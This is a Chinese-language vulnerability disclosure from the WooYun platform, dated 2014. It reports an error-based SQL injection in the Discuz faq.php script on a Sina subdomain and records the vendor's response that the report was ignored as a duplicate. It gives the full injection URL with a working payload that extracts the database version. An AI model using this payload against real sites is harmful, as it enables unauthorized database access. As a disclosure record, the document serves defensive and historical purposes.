[公开漏洞]新浪某站SQL注入漏洞
-
来源:WooYun 浏览:550次 时间:2014-07-03
新浪某站SQL注入漏洞
相关厂商:
新浪
漏洞作者:greg.wu
提交时间:2014-07-02 16:56
公开时间:2014-07-03 10:09
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:10
漏洞状态:
漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源:http://www.wooyun.org
Tags标签:
注入漏洞
漏洞详情
披露状态:
2014-07-02:细节已通知厂商并且等待厂商处理中
2014-07-03:厂商已经主动忽略漏洞,细节向公众公开
报错注入
详细说明:dz faq.php存在注入漏洞,大范围爆发了,各大站点纷纷躺枪
注入点地址:
http://club.show.sina.com.cn/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema%20.tables%20group%20by%20x)a)%23
修复方案:
打补丁。。
版权声明:转载请注明来源 greg.wu@乌云 漏洞回应 厂商回应:危害等级:无影响厂商忽略
忽略时间:2014-07-03 10:09
厂商回复:已经有白帽子提前通过ssrc提交过其漏洞,感谢对新浪安全的支持.
最新状态:暂无
上一篇: 汽车之家SQL注射下载